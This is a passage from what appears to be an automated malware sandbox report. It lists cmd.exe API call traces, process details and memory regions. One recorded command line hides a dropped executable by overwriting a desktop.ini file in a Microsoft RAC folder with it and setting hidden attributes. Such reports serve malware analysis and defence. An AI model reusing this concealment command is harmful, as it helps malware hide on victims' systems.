lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] GetFileType (hFile=0x4c) returned 0x1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1b8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.474] GetFileType (hFile=0x4c) returned 0x1 [0119.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.474] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef208*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.474] GetFileType (hFile=0x4c) returned 0x1 [0119.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.474] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef258*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.474] GetFileType (hFile=0x4c) returned 0x1 [0119.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.474] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.474] GetFileType (hFile=0x4c) returned 0x1 [0119.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.474] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2f8*, lpNumberOfBytesWritten=0x1ee2fc*=0x20, lpOverlapped=0x0) returned 1 [0119.474] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.474] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.474] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.474] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x200, lpOverlapped=0x0) returned 1 [0119.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.474] GetFileType (hFile=0x4c) returned 0x1 [0119.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.474] GetFileType (hFile=0x4c) returned 0x1 [0119.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.474] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] GetFileType (hFile=0x4c) returned 0x1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef168*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef168*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] GetFileType (hFile=0x4c) returned 0x1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1b8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] GetFileType (hFile=0x4c) returned 0x1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef208*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] GetFileType (hFile=0x4c) returned 0x1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef258*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] GetFileType (hFile=0x4c) returned 0x1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] GetFileType (hFile=0x4c) returned 0x1 [0119.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.475] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2f8*, lpNumberOfBytesWritten=0x1ee2fc*=0x20, lpOverlapped=0x0) returned 1 [0119.475] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.476] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.476] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.476] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x200, lpOverlapped=0x0) returned 1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] GetFileType (hFile=0x4c) returned 0x1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] GetFileType (hFile=0x4c) returned 0x1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] GetFileType (hFile=0x4c) returned 0x1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef168*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef168*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] GetFileType (hFile=0x4c) returned 0x1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1b8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] GetFileType (hFile=0x4c) returned 0x1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef208*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] GetFileType (hFile=0x4c) returned 0x1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef258*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] GetFileType (hFile=0x4c) returned 0x1 [0119.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.476] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] GetFileType (hFile=0x4c) returned 0x1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2f8*, lpNumberOfBytesWritten=0x1ee2fc*=0x20, lpOverlapped=0x0) returned 1 [0119.477] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.477] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.477] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.477] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x200, lpOverlapped=0x0) returned 1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] GetFileType (hFile=0x4c) returned 0x1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] GetFileType (hFile=0x4c) returned 0x1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] GetFileType (hFile=0x4c) returned 0x1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef168*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef168*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] GetFileType (hFile=0x4c) returned 0x1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1b8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] GetFileType (hFile=0x4c) returned 0x1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef208*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] GetFileType (hFile=0x4c) returned 0x1 [0119.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.477] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef258*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.478] GetFileType (hFile=0x4c) returned 0x1 [0119.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.478] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.478] GetFileType (hFile=0x4c) returned 0x1 [0119.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.478] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2f8*, lpNumberOfBytesWritten=0x1ee2fc*=0x20, lpOverlapped=0x0) returned 1 [0119.478] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.478] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.478] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.478] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x32, lpOverlapped=0x0) returned 1 [0119.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.478] GetFileType (hFile=0x4c) returned 0x1 [0119.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.478] GetFileType (hFile=0x4c) returned 0x1 [0119.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.478] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x32, lpOverlapped=0x0) returned 1 [0119.478] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.478] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.478] _close (_FileHandle=4) returned 0 [0119.478] FindNextFileW (in: hFindFile=0x3d0e90, lpFindFileData=0x1ef37c | out: lpFindFileData=0x1ef37c) returned 0 [0119.479] GetLastError () returned 0x12 [0119.479] FindClose (in: hFindFile=0x3d0e90 | out: hFindFile=0x3d0e90) returned 1 [0119.479] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0119.479] _close (_FileHandle=3) returned 0 [0119.480] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.480] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0119.480] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.480] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0119.480] _get_osfhandle (_FileHandle=0) returned 0x3 [0119.480] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0119.480] SetConsoleInputExeNameW () returned 0x1 [0119.480] GetConsoleOutputCP () returned 0x1b5 [0119.480] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0119.480] SetThreadUILanguage (LangId=0x0) returned 0x409 [0119.480] exit (_Code=0) Process: id = "68" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168e0" os_pid = "0xf3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9325 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9326 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 9327 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 9328 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 9329 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 9330 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9331 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9332 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 9333 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 9334 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 9359 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9360 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9361 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9362 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 9363 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 9364 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 9365 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9366 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 9367 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9368 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9369 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9370 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 9371 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9372 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 9373 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 9374 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9375 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 9376 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 9377 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 9378 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 9379 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 9380 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 9381 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 9382 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 9415 start_va = 0x12d0000 end_va = 0x159efff entry_point = 0x12d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 121 os_tid = 0xf40 [0119.425] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f904 | out: lpSystemTimeAsFileTime=0x12f904*(dwLowDateTime=0x84548fa0, dwHighDateTime=0x1d440a9)) [0119.425] GetCurrentProcessId () returned 0xf3c [0119.425] GetCurrentThreadId () returned 0xf40 [0119.425] GetTickCount () returned 0x2847a [0119.425] QueryPerformanceCounter (in: lpPerformanceCount=0x12f8fc | out: lpPerformanceCount=0x12f8fc*=17621417411) returned 1 [0119.426] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0119.426] __set_app_type (_Type=0x1) [0119.426] __p__fmode () returned 0x76b331f4 [0119.426] __p__commode () returned 0x76b331fc [0119.426] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0119.426] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0119.426] GetCurrentThreadId () returned 0xf40 [0119.426] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf40) returned 0x38 [0119.426] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0119.426] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0119.426] SetThreadUILanguage (LangId=0x0) returned 0x409 [0119.426] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0119.426] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f894 | out: phkResult=0x12f894*=0x0) returned 0x2 [0119.426] VirtualQuery (in: lpAddress=0x12f8cb, lpBuffer=0x12f864, dwLength=0x1c | out: lpBuffer=0x12f864*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0119.426] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f864, dwLength=0x1c | out: lpBuffer=0x12f864*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0119.426] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f864, dwLength=0x1c | out: lpBuffer=0x12f864*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0119.427] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12f864, dwLength=0x1c | out: lpBuffer=0x12f864*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0119.427] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f864, dwLength=0x1c | out: lpBuffer=0x12f864*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0119.427] GetConsoleOutputCP () returned 0x1b5 [0119.427] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0119.427] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0119.427] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.427] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0119.427] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.427] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0119.427] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.427] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0119.427] _get_osfhandle (_FileHandle=0) returned 0x3 [0119.427] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 